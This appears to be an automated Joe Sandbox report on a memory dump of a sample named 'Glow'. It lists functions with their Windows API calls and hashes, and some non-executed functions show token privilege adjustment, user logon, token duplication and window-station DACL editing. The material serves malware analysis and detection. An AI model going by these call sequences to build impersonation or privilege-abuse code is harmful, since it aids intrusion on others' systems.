Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 776e2f9defe6924cba6fbfc8ac540b1e60e9a348ae761ff24131c0c8695279bd
Instruction ID: 6a55894a7c49a26629ca9873e70bb7c4b46171b58b084e5d2828653e8e079c64
Opcode Fuzzy Hash: 776e2f9defe6924cba6fbfc8ac540b1e60e9a348ae761ff24131c0c8695279bd
Instruction Fuzzy Hash: 1851BB79A00104AFDB12DFD8C841BB97BA5EF86364F1A8578E8189F351D731DD42CB90

Function 003EFCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 003EFCCE

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: d6ba15edc9f26f5fd9ab26c9531537f010a4394ef3e0163ee52e595a31049247
Instruction ID: f73000ee21b22a51b981582c91aa960011a2c4aef722dba10285bc9c73cfa6ac
Opcode Fuzzy Hash: d6ba15edc9f26f5fd9ab26c9531537f010a4394ef3e0163ee52e595a31049247
Instruction Fuzzy Hash: 4341D976500249AFCB16EF69CC819EF77B8EF44314B21463EE5169B195DBB0DE04CB50

Function 00386679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0038663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0038668B,?,?,003862FA,?,00000001,?,?,00000000), ref: 0038664A
Part of subcall function 0038663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0038665C
Part of subcall function 0038663E: FreeLibrary.KERNEL32(00000000,?,?,0038668B,?,?,003862FA,?,00000001,?,?,00000000), ref: 0038666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003862FA,?,00000001,?,?,00000000), ref: 003866AB

Part of subcall function 00386607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003C5657,?,?,003862FA,?,00000001,?,?,00000000), ref: 00386610
Part of subcall function 00386607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00386622
Part of subcall function 00386607: FreeLibrary.KERNEL32(00000000,?,?,003C5657,?,?,003862FA,?,00000001,?,?,00000000), ref: 00386635

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 5d6157261cf35032970faa4586c2be5733e96b371b8cb0ad36e932fb796d0a11
Instruction ID: 6b7db695e3e5fd985033edee47b7ffed0ff5e499ec13bc6168965be113a66e54
Opcode Fuzzy Hash: 5d6157261cf35032970faa4586c2be5733e96b371b8cb0ad36e932fb796d0a11
Instruction Fuzzy Hash: 35112372600305ABCF16BB20C803BAD7BA59F50710F20886DF542AE1C2EF75DA049B64

Function 003B8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 003B87C0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 9e2fc97a2eab68a66b31577b2ce3008347d867be45cafd0bb62b2f13a97c058f
Instruction ID: 80306709f828ddf292d7d3e84f7f3580d29b76247ae85ec94b6ee0a599c973e3
Opcode Fuzzy Hash: 9e2fc97a2eab68a66b31577b2ce3008347d867be45cafd0bb62b2f13a97c058f
Instruction Fuzzy Hash: B611487190420AAFCF06DF58E945ADA7BF8EF48304F114069F909AB311DA31EE11CB65

Function 003B5373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003B4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,003B319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 003B5031

_free.LIBCMT ref: 003B53DF

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: ecd8d113e02164f5b092f1f4517463f737c360b9081d14d381152a7d25945d61
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: 38014E762003046BE3328F55D841F9AFBEDEB85374F25051DE684876C0EB706905C774

Function 003AE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 7653e7b78a1160b168822fed4943dd16074db64b54745c74ec84a7b0abbb01fc
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: A8F0CD325017245AE6333A679C05B9B335CCF43334F154719F5259B9D1DF78D80186D2

Function 0038B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0038B333

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: dd9d1fee6e1b47460c33700809ebdf374f6bf11b9184f1257674075ff0af719f
Instruction ID: d677f6a06dec08e75a2b46b6c1afa17232343659e284121ddf9eaeb8828fd240
Opcode Fuzzy Hash: dd9d1fee6e1b47460c33700809ebdf374f6bf11b9184f1257674075ff0af719f
Instruction Fuzzy Hash: 93F0C8B76017057ED7159F28D806BA6BB98EB45360F10822AFA19CF1D1DB71E5108BA0

Function 003FF94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 003FF987

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 191e59fc0dd9bafb999afe5be3151fb3e87616c5811db44ef284711a170c0d5b
Instruction ID: 2c7f6ca2b1acbe21a2f6c290ff0b66fbfc58c9d4f8520d37b7b30ef94f3628ef
Opcode Fuzzy Hash: 191e59fc0dd9bafb999afe5be3151fb3e87616c5811db44ef284711a170c0d5b
Instruction Fuzzy Hash: EBF08176600204BFCB06EBA5DC46D9F77B8EF46710F004054F5059F260DA70EA40C751

Function 003B4FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,003B319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 003B5031

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 77761a9c8f8eb10e07d26107e8e478cb4e26c5e1b632c36f22fde486fe691206
Instruction ID: 2c48d5e3ef894951454af9b32c4ac060211e6c9738fa17ce3ac5d8bbce2836bf
Opcode Fuzzy Hash: 77761a9c8f8eb10e07d26107e8e478cb4e26c5e1b632c36f22fde486fe691206
Instruction Fuzzy Hash: D4F0E936614E2467EF333A76DC01BDA3758FF917E4F168021BE049B890DB70D80146E0

Function 003B3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,003A6A79,?,0000015D,?,?,?,?,003A85B0,000000FF,00000000,?,?), ref: 003B3BC5

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9e1bd2cc44d627e474d6b62419ffb7767a631368bd675d287d540dd0fb75e35e
Instruction ID: 7433eaad84ca4b7d73654c6717470e6088077ca9e6310a238e34106ec5c07aab
Opcode Fuzzy Hash: 9e1bd2cc44d627e474d6b62419ffb7767a631368bd675d287d540dd0fb75e35e
Instruction Fuzzy Hash: F2E09B3124063066DB23B6769C01BEB3A4CEF423A4F160161FE059ADD5DF70DD4085E4

Function 003866E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b4d1425c6ac63cc53f98495b85d9483c0cf42de1c5539bb7aa71c9507c7d8ea
Instruction ID: 28ac439a611c8df18c2c640a5fe2a9d5b237752654c206336817f19ec55bf298
Opcode Fuzzy Hash: 4b4d1425c6ac63cc53f98495b85d9483c0cf42de1c5539bb7aa71c9507c7d8ea
Instruction Fuzzy Hash: 95F039B1505B02CFCB36AF64D8A1C16BBE8BF14329325897EE5D686A10C735AC80DF51

Function 0038684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00386868

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 98fb19d63e91b1e5ad54446e8315a3aed2b727d7960baef20f456535a5ea9804
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: FCF0F87550020DFFDF05DF90C941E9EBB79FB04318F208489F9159A151C336EA61ABA1

Function 00383907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00383963

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 2b6262ece54de0703be6445628e0909500e609b5671ac455e486dcf12781ef82
Instruction ID: 249ed6f3a52b40f6a1f3c63e6d284975560adfb394c1765eb9ffcb7945eeb138
Opcode Fuzzy Hash: 2b6262ece54de0703be6445628e0909500e609b5671ac455e486dcf12781ef82
Instruction Fuzzy Hash: A6F037719143149FE7539F24DC457D67BBCA702708F0040F6A64496292D7B49788CF55

Function 00383A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00383A76

Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: c2150c3abeb9c62eee362b04e83428d68a816a616bad7cc2caf73ff0426d2a3b
Instruction ID: 46f285c642a6c0ad01e7cc0f4e535d9e0377fb104885a4a165ad53b9aaf64a81
Opcode Fuzzy Hash: c2150c3abeb9c62eee362b04e83428d68a816a616bad7cc2caf73ff0426d2a3b
Instruction Fuzzy Hash: 85E08C72A002245BCB21A2589C06FEAB7ADDB887A0F0440B5BC09DB258D960AD808690

Function 003C071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,003C0A84,?,?,00000000,?,003C0A84,00000000,0000000C), ref: 003C0737

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7237d6ed0b25e561667b52de49fe3a1ea413953c2ebaaee0473ed0f986f54601
Instruction ID: 798fe39cd9662bbfad68e938cc6f6f121fdba6248b3f1f4aa7355240fecde94f
Opcode Fuzzy Hash: 7237d6ed0b25e561667b52de49fe3a1ea413953c2ebaaee0473ed0f986f54601
Instruction Fuzzy Hash: F8D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018010BE1856020C732E821AB94

Function 003EEAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,003ED840), ref: 003EEAB1

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 24bbec47b9b45890ba7f9e08d86b996fb0e659d8fd8161a71b6c68c0b78120a7
Instruction ID: 75d90cb8048fee8a835634c17739b8449f9c88cd2db81392d63dc35176b4755e
Opcode Fuzzy Hash: 24bbec47b9b45890ba7f9e08d86b996fb0e659d8fd8161a71b6c68c0b78120a7
Instruction Fuzzy Hash: 9BB0926440067005AD294A3D5A09999330078423A57DE1BE8E479850E1C339880FA950

Function 003F664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 003EDC54: FindFirstFileW.KERNEL32(?,?), ref: 003EDCCB
Part of subcall function 003EDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 003EDD1B
Part of subcall function 003EDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 003EDD2C
Part of subcall function 003EDC54: FindClose.KERNEL32(00000000), ref: 003EDD43

GetLastError.KERNEL32 ref: 003F666E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 512cdcaff2c73cf0a701785291b5b0f63a6e1fbf6849bfedbd9dec1d5b0c7ec1
Instruction ID: 3917112d3a7e984ca90c3e04ee381e20cdda18a8cbc9b231102ebfd91fb07898
Opcode Fuzzy Hash: 512cdcaff2c73cf0a701785291b5b0f63a6e1fbf6849bfedbd9dec1d5b0c7ec1
Instruction Fuzzy Hash: 1AF08C366002149FCB11FF59D845BAEB7E6AF88360F148459F9098B352CB70BC01CB94

Non-executed Functions

Function 003E1B4D Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 003E2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E205A
Part of subcall function 003E2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E2087
Part of subcall function 003E2010: GetLastError.KERNEL32 ref: 003E2097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 003E1BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003E1BF4
CloseHandle.KERNEL32(?), ref: 003E1C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003E1C1D
GetProcessWindowStation.USER32 ref: 003E1C36
SetProcessWindowStation.USER32(00000000), ref: 003E1C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003E1C5C

Part of subcall function 003E1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003E1B48), ref: 003E1A20
Part of subcall function 003E1A0B: CloseHandle.KERNEL32(?,?,003E1B48), ref: 003E1A35

Strings

winsta0, xrefs: 003E1C18
jD, xrefs: 003E1CDE
default, xrefs: 003E1C57
, xrefs: 003E1BA6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$jD
API String ID: 22674027-1564320998
Opcode ID: 639415fed9941d800163e7792390cbbbc7dc87cde37393578efd2b52ed821d82
Instruction ID: 072b727a0bbe2a98fcf1cac3f581f6b6f7025b82e01d856bc1ca93a6c43a204b
Opcode Fuzzy Hash: 639415fed9941d800163e7792390cbbbc7dc87cde37393578efd2b52ed821d82
Instruction Fuzzy Hash: 57818BB1900258ABDF129FA5DC49FFF7BB8FF04300F158229F914A62A0D7758955CB64

Function 003E14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003E1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E1A60
Part of subcall function 003E1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A6C
Part of subcall function 003E1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A7B
Part of subcall function 003E1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A82
Part of subcall function 003E1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003E1518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003E154C
GetLengthSid.ADVAPI32(?), ref: 003E1563
GetAce.ADVAPI32(?,00000000,?), ref: 003E159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003E15B9
GetLengthSid.ADVAPI32(?), ref: 003E15D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 003E15D8
HeapAlloc.KERNEL32(00000000), ref: 003E15DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 003E1600
CopySid.ADVAPI32(00000000), ref: 003E1607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003E1636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003E1658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 003E166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E1691
HeapFree.KERNEL32(00000000), ref: 003E1698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E16A1
